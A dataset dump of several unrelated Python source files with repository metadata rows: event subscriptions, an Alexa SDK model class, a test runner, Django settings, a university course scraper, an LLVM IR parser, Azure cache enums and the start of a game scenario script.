] | permissive | errorsandwarnings/polyaxon | 40cc1ee5797fe8add0a3bfb693abcfcab1c2f9cb | 5eec0bc4aa4ad5f2dce8d1c0ef653265bf4fe6be | refs/heads/master | 2020-03-21T05:28:27.001571 | 2018-06-20T06:43:55 | 2018-06-20T07:40:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | import tracker
from event_manager.events import job
tracker.subscribe(job.JobCreatedEvent)
tracker.subscribe(job.JobUpdatedEvent)
tracker.subscribe(job.JobStartedEvent)
tracker.subscribe(job.JobStartedTriggeredEvent)
tracker.subscribe(job.JobSoppedEvent)
tracker.subscribe(job.JobSoppedTriggeredEvent)
tracker.subscribe(job.JobViewedEvent)
tracker.subscribe(job.JobNewStatusEvent)
tracker.subscribe(job.JobFailedEvent)
tracker.subscribe(job.JobSucceededEvent)
tracker.subscribe(job.JobDoneEvent)
tracker.subscribe(job.JobDeletedEvent)
tracker.subscribe(job.JobDeletedTriggeredEvent)
tracker.subscribe(job.JobLogsViewedEvent)
tracker.subscribe(job.JobRestartedEvent)
tracker.subscribe(job.JobRestartedTriggeredEvent)
tracker.subscribe(job.JobStatusesViewedEvent)
| [
"[email protected]"
] | |
2d532de125892942cfed2532b6dd7d87b171d905 | aff694b019806db8f8cd66fd205f9049351bb10c | /bin/easy_install-2.7 | 8a5bf35b69b51d92171e4827376f2869c6617b0f | [] | no_license | mikilabarda/my-first-blog | 3885d08f87e9c3f05da7000b9e60d29f3895efd3 | 7e1476fa75e6db95bfe8685ad43a233777166071 | refs/heads/master | 2021-05-30T19:25:38.022284 | 2016-03-20T05:31:16 | 2016-03-20T05:31:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | 7 | #!/Users/Miki/Desktop/env/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
ca40804f3b11f5bf3ee4a29175aac94bdf3ecb7c | 32c4b55b781b0b08860e1e56eb3cf226b1dc7644 | /ask-sdk-model/ask_sdk_model/services/reminder_management/trigger.py | af37e6b7ee01251792653e4516fb55111ff43832 | [
"Apache-2.0"
] | permissive | vertolab/alexa-apis-for-python | 8d2b4b5b44d0360bfa24508ca7d55e4f2c92e0dd | 85274cff0818e78d87f7f389e7b0e4613ddaa170 | refs/heads/master | 2020-04-29T01:33:15.395179 | 2019-03-15T02:33:42 | 2019-03-15T02:33:42 | 175,734,525 | 0 | 0 | Apache-2.0 | 2019-03-15T02:29:44 | 2019-03-15T02:29:44 | null | UTF-8 | Python | false | false | 5,240 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional
from datetime import datetime
from ask_sdk_model.services.reminder_management.trigger_type import TriggerType
from ask_sdk_model.services.reminder_management.recurrence import Recurrence
class Trigger(object):
"""
Trigger information for Reminder
:param object_type:
:type object_type: (optional) ask_sdk_model.services.reminder_management.trigger_type.TriggerType
:param scheduled_time: Valid ISO 8601 format - Intended trigger time
:type scheduled_time: (optional) datetime
:param offset_in_seconds: If reminder is set using relative time, use this field to specify the time after which reminder ll ring (in seconds)
:type offset_in_seconds: (optional) int
:param time_zone_id: Intended reminder's timezone
:type time_zone_id: (optional) str
:param recurrence:
:type recurrence: (optional) ask_sdk_model.services.reminder_management.recurrence.Recurrence
"""
deserialized_types = {
'object_type': 'ask_sdk_model.services.reminder_management.trigger_type.TriggerType',
'scheduled_time': 'datetime',
'offset_in_seconds': 'int',
'time_zone_id': 'str',
'recurrence': 'ask_sdk_model.services.reminder_management.recurrence.Recurrence'
}
attribute_map = {
'object_type': 'type',
'scheduled_time': 'scheduledTime',
'offset_in_seconds': 'offsetInSeconds',
'time_zone_id': 'timeZoneId',
'recurrence': 'recurrence'
}
def __init__(self, object_type=None, scheduled_time=None, offset_in_seconds=None, time_zone_id=None, recurrence=None):
# type: (Optional[TriggerType], Optional[datetime], Optional[int], Optional[str], Optional[Recurrence]) -> None
"""Trigger information for Reminder
:param object_type:
:type object_type: (optional) ask_sdk_model.services.reminder_management.trigger_type.TriggerType
:param scheduled_time: Valid ISO 8601 format - Intended trigger time
:type scheduled_time: (optional) datetime
:param offset_in_seconds: If reminder is set using relative time, use this field to specify the time after which reminder ll ring (in seconds)
:type offset_in_seconds: (optional) int
:param time_zone_id: Intended reminder's timezone
:type time_zone_id: (optional) str
:param recurrence:
:type recurrence: (optional) ask_sdk_model.services.reminder_management.recurrence.Recurrence
"""
self.__discriminator_value = None
self.object_type = object_type
self.scheduled_time = scheduled_time
self.offset_in_seconds = offset_in_seconds
self.time_zone_id = time_zone_id
self.recurrence = recurrence
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, Trigger):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
804fcab8ec23cea1ffebc6b018cc84cd0f542370 | c66955c6fc178955c2024e0318ec7a91a8386c2d | /testframework/excise/runnerwithallure.py | 2918eed15525373dfcc856b73f3e07c020e0037c | [] | no_license | duheng18/python-study | a98642d6ee1b0043837c3e7c5b91bf1e28dfa588 | 13c0571ac5d1690bb9e615340482bdb2134ecf0e | refs/heads/master | 2022-11-30T17:36:57.060130 | 2019-11-18T07:31:40 | 2019-11-18T07:31:40 | 147,268,053 | 1 | 0 | null | 2022-11-22T03:36:51 | 2018-09-04T00:49:42 | Python | UTF-8 | Python | false | false | 1,407 | py | #!/usr/bin/env python
# encoding: utf-8
import sys
import os
import pytest
import subprocess
import logging
import allure
import shutil
#为什么我们要设置这个路径到pythonPATH
sys.path.append(os.path.dirname(sys.modules[__name__].__file__))
fileHandler = logging.FileHandler(filename="../log/uiauto.log",encoding="utf-8")
logging.getLogger().setLevel(0)
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s %(module)s:%(lineno)d %(message)s')
fileHandler.setFormatter(formatter)
logging.getLogger().addHandler(fileHandler)
if __name__ == '__main__':
shutil.rmtree('../log/report/xml/')
#pytest.main(['-sq', '--alluredir', '../log/testreport', 'testcases/myselector/test_all_stocks.py'])
#pytest.main(['-sq', '--alluredir', '../log/testreport/xml', 'testcases/login','testcases/myselector'])
#pytest.main(['--alluredir', '../log/report/xml','--allure_severities=blocker', 'testcases/'])
pytest.main(['--alluredir', '../log/report/xml', 'testcases/alluredemo/login/test_login.py::TestLogin::test_2474609'])
#pytest.main(['--alluredir', '../log/report/xml','--allure-severities=blocker', 'testcases/alluredemo/'])
#pytest.main(['--alluredir', '../log/report/xml','--allure-features=测试登录功能', 'testcases/alluredemo/'])
print(subprocess.getstatusoutput('/usr/local/bin/allure generate --clean ../log/report/xml -o ../log/report/html'))
| [
"[email protected]"
] | |
8bdced7c42b83cf816e4f2539ea174d548463aeb | 1f074b0080c75fe7a3056b021551408f96396c59 | /djangoTutorial/settings.py | 1317286cc1e6643f34805a7c3c1a1155948eb079 | [] | no_license | jkiggins/djangoTutorial | 9668c0bb84f60334a43c0c698f6c7ce357342bf7 | d58e7757cbcbdd0b8f42df6859e260dafe2d7d19 | refs/heads/master | 2020-12-01T17:29:25.565130 | 2016-09-10T01:27:21 | 2016-09-10T01:27:21 | 66,515,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,264 | py | """
Django settings for djangoTutorial project.
Generated by 'django-admin startproject' using Django 1.9.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a!t#35^$4z+^jq3z$wbtwa!5w&*&n4d)rq_m#e4$odu75j0suv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoTutorial.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'djangoTutorial.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'EST'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| [
"="
] | = |
4c9532d704fa42823f2a392471ecf7fe6eb6a66e | 1ecde4178548f331f15717f245e3f657b58b9993 | /yyx_crawler/scrapySchool_England_Ben_alevel_ib/scrapySchool_England_Ben/spiders/EdinburghNapierUniversity_Alevel_Ib.py | 852782161acbd27696c6e0f7a26b3c11481e7502 | [] | no_license | gasbarroni8/python_spider | 296dcb7c3fd9dd028423fe5ec0a321d994478b15 | 7935fa462926bc8ea9bf9883bd15265dd0d3e6df | refs/heads/master | 2023-03-26T05:22:59.858422 | 2019-04-15T07:17:56 | 2019-04-15T07:17:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,486 | py | # -*- coding: utf-8 -*-
import scrapy
import re
from scrapySchool_England_Ben.clearSpace import clear_space, clear_lianxu_space
from scrapySchool_England_Ben.getItem import get_item
from scrapySchool_England_Ben.getTuition_fee import getTuition_fee
from scrapySchool_England_Ben.items import ScrapyschoolEnglandBenItem
from scrapySchool_England_Ben.getIELTS import get_ielts, get_toefl
from scrapySchool_England_Ben.getStartDate import getStartDate
from scrapySchool_England_Ben.remove_tags import remove_class
from scrapySchool_England_Ben.getDuration import getIntDuration, getTeachTime
from w3lib.html import remove_tags
class EdinburghNapierUniversity_Alevel_IbSpider(scrapy.Spider):
name = "EdinburghNapierUniversity_Alevel_Ib"
start_urls = ["https://www.bolton.ac.uk/subject-areas/all-subjects/"]
def parse(self, response):
links = ["https://www.napier.ac.uk/courses/bsc-hons-physical-activity-and-health-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-sport-and-exercise-science-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bdes-hons-graphic-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-photography-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bdes-hons-product-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-communication-advertising--public-relations-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-languages-and-intercultural-communication-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-microbiology-and-biotechnology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-animal-biology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-acting-and-english-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-festival--event-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-sports-coaching-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-civil-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-computing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-creative-computing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-social-sciences-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/beng-hons-cybersecurity-and-forensics-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-civil-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-festival--event-management-with-tourism-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-festival--event-management-with-language-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-management-with-entrepreneurship-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-marine-and-freshwater-biology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-animal-and-conservation-biology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-business-management-and-languages-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality-management-and-festival--event-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-management-with-marketing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-management-with-human-resource-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-biological-sciences-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality-management-with-language-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-biomedical-sciences-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-applied-microbiology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-business-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-hospitality--service-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-business-studies-sandwich-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-accounting-with-corporate-finance-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-accounting-with-law-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-accounting-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-civil--transportation-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-psychology-with-sociology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-financial-services-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-adult-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-engineering-with-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons--bsc-hons-psychology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-mechatronics-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-construction-and-project-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-learning-disabilities-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-international-hospitality-management-city-of-glasgow-college-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-tourism-management-with-language-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/llb--llb-hons-law-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-criminology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-tourism-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bdes-hons-interior--spatial-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-information-technology-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-mechanical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-policing-and-criminology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-business-information-technology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-english-and-film-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-music-popular-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/beng-hons-computer-systems-and-networks-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-english-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bmus-hons-music-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-business-management-west-lothian-college-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-computing-science-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bm-midwifery-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/baba-hons-accounting-and-finance-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-television-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-journalism-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-software-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-international-tourism-and-airline-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-web-design-and-development-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-software-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-games-development-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-electronic--electrical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-mental-health-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/meng-electronic--electrical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-digital-media-and-interaction-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-energy-and-environmental-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-film-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-architectural-technology-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bn-nursing-child-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bscbsc-hons-real-estate-surveying-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-sound-design-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-acting-for-stage-and-screen-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-marketing-with-digital-media-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-digital-media-and-interaction-design-global-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/ba-hons-marketing-management-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-hons-veterinary-nursing-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bengbeng-hons-mechanical-engineering-undergraduate-fulltime",
"https://www.napier.ac.uk/courses/bsc-nursing-studies--option-rich-programme-undergraduate-fulltime", ]
print(len(links))
links = list(set(links))
print(len(links))
for url in links:
yield scrapy.Request(url, callback=self.parse_data, meta={'url': url})
def parse_data(self, response):
item = get_item(ScrapyschoolEnglandBenItem)
item['university'] = "Edinburgh Napier University"
item['url'] = response.meta['url']
print("===========================")
print(response.url)
print(response.meta['url'])
try:
alevel = response.xpath(
"//div[@id='tab1']//h3[contains(text(),'A Level')]/following-sibling::*").extract()
print(alevel)
if len(alevel) > 0:
for i in range(len(alevel)):
if "<h3>" in alevel[i]:
item['alevel'] = remove_tags(clear_lianxu_space(alevel[:i]))
break
if item['alevel'] == "":
item['alevel'] = remove_tags(clear_lianxu_space(alevel))
# item['alevel'] = clear_lianxu_space(alevel)
print("item['alevel']: ", item['alevel'])
ib = response.xpath(
"//div[@id='tab1']//h3[contains(text(),'International Baccalaureate')]/following-sibling::*").extract()
print("ib: ", ib)
if len(ib) > 0:
for i in range(len(ib)):
if "<h3>" in ib[i]:
item['ib'] = remove_tags(clear_lianxu_space(ib[:i]))
break
if item['ib'] == "":
item['ib'] = remove_tags(clear_lianxu_space(ib))
# item['ib'] = clear_lianxu_space(ib)
print("item['ib']: ", item['ib'])
yield item
except Exception as e:
with open("scrapySchool_England_Ben/error/" + item['university'] + str(item['degree_type']) + ".txt", 'a', encoding="utf-8") as f:
f.write(str(e) + "\n" + response.url + "\n========================\n")
print("异常:", str(e))
print("报错url:", response.url)
| [
"[email protected]"
] | |
73b7beaa9bea2b28e0fd1617ec699f27fe407e5a | 107f9bbd587decbab2e6188c0085e9f67b5f3708 | /Extractor/util/DoubleValExtractor.py | 6bba748c3edadf2ace17f5fc93206e110ab92d6e | [
"Apache-2.0"
] | permissive | FloatErrorAnalysis/LLVM | 4dbcd52a60774847949cf190a71cdf374ca437ce | 7ce723e1fe7fee227ab7c0ac8d49bca89459957a | refs/heads/master | 2020-04-03T14:56:55.038691 | 2018-11-11T15:09:56 | 2018-11-11T15:09:56 | 155,343,259 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,116 | py | # 一个专门用于提取ll文件double类型变量和相关函数以及double类型的函数的工具类
''' 全局标识符(函数,全局变量)以“@”字符开头。
本地标识符(注册名称,类型)以'%'字符开头 '''
class DoubleValExtractor:
source_file_path = ''
ll_file_content_list = []
vm_module = []
double_vars = []
double_functions = []
double_statements = []
def __init__(self, source_file_path):
self.source_file_path = source_file_path
with open(self.source_file_path, 'r') as ll_file:
ll_file_content = ll_file.read()
tmp_list = ll_file_content.split('\n')
for line in tmp_list:
self.ll_file_content_list.append(line.strip())
if 'double' in line:
self.double_statements.append(line)
def extract_double_functions(self):
# 定义的double函数,以 define double标识开头 '}'结尾
flag = False
for line in self.ll_file_content_list:
if 'define double' in line:
flag = True
if flag:
self.double_functions.append(line)
if '}' in line:
flag = False
# 申明
if 'declare double' in line:
self.double_functions.append(line)
return self.double_functions
# TODO
def extract_double_vars(self):
for statement in self.double_statements:
# 列出所有double型临时寄存器
if statement.find('%') != -1:
idx = statement.find('%')
if statement[idx + 1: idx + 2].isalnum():
self.double_vars.append('%' + statement[idx + 1: idx + 2])
return list(set(self.double_vars))
def extract_double_concerned_statements(self):
return list(set(self.double_statements + self.extract_double_functions()))
extractor = DoubleValExtractor('/Users/py/GitHub/LLVM/functions/ll_file/sqrt_minus.ll')
with open('double_ll', 'w') as f:
f.writelines(extractor.extract_double_concerned_statements())
| [
"[email protected]"
] | |
49440e2525655c4cccc5adb43fc2eaae167e8f7e | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/cache/_enums.py | 687882b04641acfe4856e26c5ddfb16742be973e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 3,490 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'AofFrequency',
'ClusteringPolicy',
'DayOfWeek',
'EvictionPolicy',
'PrivateEndpointServiceConnectionStatus',
'Protocol',
'PublicNetworkAccess',
'RdbFrequency',
'ReplicationRole',
'SkuFamily',
'SkuName',
'TlsVersion',
]
class AofFrequency(str, Enum):
"""
Sets the frequency at which data is written to disk.
"""
AOF_FREQUENCY_1S = "1s"
ALWAYS = "always"
class ClusteringPolicy(str, Enum):
"""
Clustering policy - default is OSSCluster. Specified at create time.
"""
ENTERPRISE_CLUSTER = "EnterpriseCluster"
OSS_CLUSTER = "OSSCluster"
class DayOfWeek(str, Enum):
"""
Day of the week when a cache can be patched.
"""
MONDAY = "Monday"
TUESDAY = "Tuesday"
WEDNESDAY = "Wednesday"
THURSDAY = "Thursday"
FRIDAY = "Friday"
SATURDAY = "Saturday"
SUNDAY = "Sunday"
EVERYDAY = "Everyday"
WEEKEND = "Weekend"
class EvictionPolicy(str, Enum):
"""
Redis eviction policy - default is VolatileLRU
"""
ALL_KEYS_LFU = "AllKeysLFU"
ALL_KEYS_LRU = "AllKeysLRU"
ALL_KEYS_RANDOM = "AllKeysRandom"
VOLATILE_LRU = "VolatileLRU"
VOLATILE_LFU = "VolatileLFU"
VOLATILE_TTL = "VolatileTTL"
VOLATILE_RANDOM = "VolatileRandom"
NO_EVICTION = "NoEviction"
class PrivateEndpointServiceConnectionStatus(str, Enum):
"""
Indicates whether the connection has been Approved/Rejected/Removed by the owner of the service.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
class Protocol(str, Enum):
"""
Specifies whether redis clients can connect using TLS-encrypted or plaintext redis protocols. Default is TLS-encrypted.
"""
ENCRYPTED = "Encrypted"
PLAINTEXT = "Plaintext"
class PublicNetworkAccess(str, Enum):
"""
Whether or not public endpoint access is allowed for this cache. Value is optional but if passed in, must be 'Enabled' or 'Disabled'. If 'Disabled', private endpoints are the exclusive access method. Default value is 'Enabled'
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class RdbFrequency(str, Enum):
"""
Sets the frequency at which a snapshot of the database is created.
"""
RDB_FREQUENCY_1H = "1h"
RDB_FREQUENCY_6H = "6h"
RDB_FREQUENCY_12H = "12h"
class ReplicationRole(str, Enum):
"""
Role of the linked server.
"""
PRIMARY = "Primary"
SECONDARY = "Secondary"
class SkuFamily(str, Enum):
"""
The SKU family to use. Valid values: (C, P). (C = Basic/Standard, P = Premium).
"""
C = "C"
P = "P"
class SkuName(str, Enum):
"""
The type of RedisEnterprise cluster to deploy. Possible values: (Enterprise_E10, EnterpriseFlash_F300 etc.)
"""
ENTERPRISE_E10 = "Enterprise_E10"
ENTERPRISE_E20 = "Enterprise_E20"
ENTERPRISE_E50 = "Enterprise_E50"
ENTERPRISE_E100 = "Enterprise_E100"
ENTERPRISE_FLASH_F300 = "EnterpriseFlash_F300"
ENTERPRISE_FLASH_F700 = "EnterpriseFlash_F700"
ENTERPRISE_FLASH_F1500 = "EnterpriseFlash_F1500"
class TlsVersion(str, Enum):
"""
The minimum TLS version for the cluster to support, e.g. '1.2'
"""
TLS_VERSION_1_0 = "1.0"
TLS_VERSION_1_1 = "1.1"
TLS_VERSION_1_2 = "1.2"
| [
"[email protected]"
] | |
c9f5c22556be98cbe18c1f2803000713bd307741 | 80301f1cffc5afce13256e2ecab6323c5df00194 | /cn.sc/py/C1707.py | aae24a1028182e2d6b73336421142d36b5e71075 | [] | no_license | ZhenjianYang/SoraVoiceScripts | c1ddf7c1bbcb933243754f9669bd6b75777c87b9 | 94a948090aba0f63b10b2c69dc845dc99c822fc4 | refs/heads/master | 2023-04-18T04:54:44.306652 | 2023-04-06T11:15:17 | 2023-04-06T11:15:17 | 103,167,541 | 43 | 11 | null | 2021-03-06T08:52:54 | 2017-09-11T17:36:55 | Python | UTF-8 | Python | false | false | 20,443 | py | from ED6SCScenarioHelper import *
def main():
SetCodePage("gbk")
# 柏斯
CreateScenaFile(
FileName = 'C1707 ._SN',
MapName = 'Bose',
Location = 'C1707.x',
MapIndex = 1,
MapDefaultBGM = "ed60010",
Flags = 0,
EntryFunctionIndex = 0xFFFF,
Reserved = 0,
IncludedScenario = [
'',
'',
'',
'',
'',
'',
'',
''
],
)
BuildStringList(
'@FileName', # 8
'歼灭天使玲', # 9
'福音', # 10
'帕蒂尔·玛蒂尔', # 11
)
DeclEntryPoint(
Unknown_00 = 0,
Unknown_04 = 0,
Unknown_08 = 6000,
Unknown_0C = 4,
Unknown_0E = 0,
Unknown_10 = 0,
Unknown_14 = 9500,
Unknown_18 = -10000,
Unknown_1C = 0,
Unknown_20 = 0,
Unknown_24 = 0,
